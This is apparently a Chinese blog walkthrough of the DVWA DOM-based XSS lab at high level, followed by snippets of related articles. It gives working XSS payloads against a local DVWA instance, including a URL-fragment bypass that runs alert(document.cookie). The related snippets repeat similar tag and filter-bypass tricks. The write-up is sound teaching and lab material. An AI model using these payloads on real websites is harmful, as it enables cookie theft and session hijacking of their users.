DVWA - XSS DOM (high)

最新推荐文章于 2025-07-13 13:31:25 发布
原创 最新推荐文章于 2025-07-13 13:31:25 发布 · 592 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了跨站脚本(XSS)攻击的各种技巧,包括如何绕过不同级别的过滤机制,利用URL锚点进行攻击,以及对服务器端代码的详细分析。通过具体的案例,展示了如何构造payload触发XSS漏洞。

随便选择一个。url中会出现我们选的哪个
在这里插入图片描述

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
应该与medium级别一样,过滤了script标签

试试 <img src=1 onerror=alert(document.cookie)>

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cimg%20src=1%20onerror=alert(document.cookie)%3E

在这里插入图片描述再换一种方法
URL的锚(#符号之后的任何内容)不会发送到服务器,因此无法被阻止

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
成功执行

代码分析

在这里插入图片描述
可以看出,服务器端代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。白名单只允许传的 default值 为 French English German Spanish 其中一个。

网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)_dvwa xss注入
2303_79055586的博客
04-29 618
外链图片转存中…(img-J1KBhZuE-1714395335186)][外链图片转存中…(img-GwLZ0Yna-1714395335186)][外链图片转存中…(img-FGdqn29T-1714395335187)][外链图片转存中…(img-4tacwhLb-1714395335188)][外链图片转存中…(img-f6UpDGGB-1714395335188)][外链图片转存中…(img-G2HmD2q2-1714395335189)]
DVWA-XSS-DOM 全级别教程
weixin_44716769的博客
09-08 1373
XSS-DOM Low等级 查看源码 无任何保护措施,直接尝试注入。 查看页面源码 1.document和windows对象: 1)document表示的是一个文档对象,window表示的是一个窗口对象,一个窗口下可以有多个文档对象。所以一个窗口下只有一个window.location.href,但是可能有多个document.URL、document.location.href 2)window对象:它是一个顶层对象,而不是另一个对象的属性即浏览器的窗口。 3)document对象:该对象是windo
XSS攻击-DVWAHigh
天威一号
11-21 283
阿斯顿发射点
DVWA-Hight-DOMXSS漏洞
qq_75121443的博客
01-08 818
这里后端代码不太可能将所有可能利用黑名单的形式全部写入过滤代码中,所以这里后端的过滤代码大概率是白名单,也就是除了这个下拉列表中的名单以外的数据提交过去也大概是不管用的。,该字符后的数据不会发送到服务器端,#后面的内容是对浏览器的操作,不会发送到http请求当中去,从而绕过服务端过滤。这里可以用到一个思路,即不让数据到达后端进行判断,直接从前端的角度进行一个弹窗。首先打开hight模块的DVWA,并来到DOMXSS漏洞处。成功触发弹窗,DOMxss漏洞利用完成。这里普通的js代码被过滤。
DVWA靶场通关笔记-DOMXSS(High级别)
mooyuan的网络安全博客
07-13 1431
DVWA(Damn Vulnerable Web Application)中的 XSS DOM关卡是用于练习和演示 DOM XSS的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对高等级别(High)关卡进行渗透实战。
DVWA中(medium)、高(high)级别xss
白帽小学二年级的博客
12-23 1089
DVWA中(medium)、高(high)级别xss
DVWA攻略-05-XSS-DOM型/反射型/存储型
Xor0ne
07-16 1001
参考文献: DVWA靶场-XSSDOM型、反射型、存储型) 文章目录9.DOM-xss9.1、low9.2、medium9.3、high9.4、impossible10.Reflected XSS10.1、low10.2、medium10.3、high10.4、impossible11.Stored-xss11.1、low11.2、medium11.3、 high11.4、impossible 9.DOM-xss DOM,文档对象模型(Document Object Model),是W3C组织推荐的处
玩转DVWAXSS DOM
key01362000的博客
09-29 1252
DVWAXSS DOM攻击
DVWA-存储型xss
Darklord.W
04-09 637
存储型: 低: 输入 <script>alert('XSS stored')</script> 存储型XSS是长期存储在服务器端,每次访问时都会执行js脚本 <script onload=alert('XSS1')> <a href=https://www.baidu.com>登录</a>3 <scrip...
DVWA源代码
10-16
dvwa web漏洞演示平台代码,有需要的朋友可以下载
不能查看源代码
05-26
不能查看源代码 屏蔽源代码 防止代码泄露
DVWAXSS-----------------high+各级别总结
qq_43665434的博客
02-21 707
DVWAXSS-----------------high+各级别总结 1、Reflected 输入测试语句 查看网页源码: 尝试<script>alert(/xss/)</script>,以及其大小写混合、拼凑版本均不成功。 尝试其他标签绕过成功: <img src=1 onerror=alert(/xss/)> <svg onload=alert(/xss/)> 源码分析: preg_replace()函数正则匹配参数中的<script并替换
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)
热门推荐
关注网络安全、云原生安全
10-18 1万+
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)XSS(Reflected)XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
DVWA系列】——xssDOM)——High详细教程
2402_84408069的博客
06-11 1258
本文深入剖析了DVWADOMXSSHigh级别)的高级攻防技术。High级别通过正则表达式过滤<script>标签及HTML片段,但仍存在空字符绕过、伪协议利用等漏洞。文章详细演示了三种高级绕过手法:空字符分割攻击、JavaScript伪协议利用和跨文档攻击向量,并给出0-click Cookie窃取的完整实现方案,包括自动化Payload构造、WebSocket加密通道等隐蔽技术。在防御方面,提出企业级五重防护矩阵:严格白名单验证、安全DOM操作、输出编码、CSP策略和安全参数解析
DVWA-Hight-xss漏洞(1),2024年最新2024年网络安全面试心得
2401_83947353的博客
04-15 305
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这里发现alert没有被过滤,而script标签又被针对过滤了,这里可以尝试一些基础绕过手法。这里原本是10,但是只是前端限制,没有做后端限制,直接从前端调试接口将长度调为110即可。这个代码表示调用img图片,地址为src,这里src不存在,则会导致onerror执行。比如大小写绕过等等,但是这里我就不费事了,一般没有用。发现这里针对img标签没有过滤的手段。
DVWA-XSS(Reflected)Low/Medium/High低中高级别
wangyuxiang946的博客
03-25 1万+
DVWA XSS(Reflected)Low DVWA XSS(Reflected)Medium DVWA XSS(Reflected)High
DVWA练习——XSS
haoaaao的博客
01-22 474
一、xss(reflected) (1)难度:low 提交代码 (2)难度:medium a、查看源代码,发现将<script>标签替换置空 b、发现将某个东西替换成空,首先想到“双写绕过”的办法 /****双写绕过eg:构造<sc<script>ript>,当<script>被过滤掉时,剩下的字符自动拼接在一起,就形成了<script> ****/ (3)、难度:high 查看源码,发现对多个...
DVWA指点迷津-XSS(Stored)
肉肉球麻里的博客
10-23 310
XSS(Stored) 特点 又名“存储型XSS”。攻击者的“恶意语句”会存储在服务器端数据库,具有很强的稳定性。每次前端调用数据库内容,则会触发语句。一般出现在留言板、上传资料等与数据库有交互的模块。相比反射型XSS,该类型的XSS带来的危害更大,持续事件更久。 漏洞危害 泄露用户的Cooike 泄露用户的IP地址、浏览器信息 篡改网页 XSS钓鱼 DVWA Low 应用防御措施 服务器端只检查是否存在“name”和“message”这两个字段、数据库连接,以及转义特殊符号,接着进行Update,没对
DVWA靶场XSSDOM型不出现语言
最新发布
12-07
根据引用内容,特别是引用[3]和[4],我们知道在DVWADOMXSS中,不同安全级别(Low, Medium, High)对输入的处理不同,可能导致下拉框不显示语言选项。 分析引用: 引用[3]提到,在Medium级别,后端代码使用...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值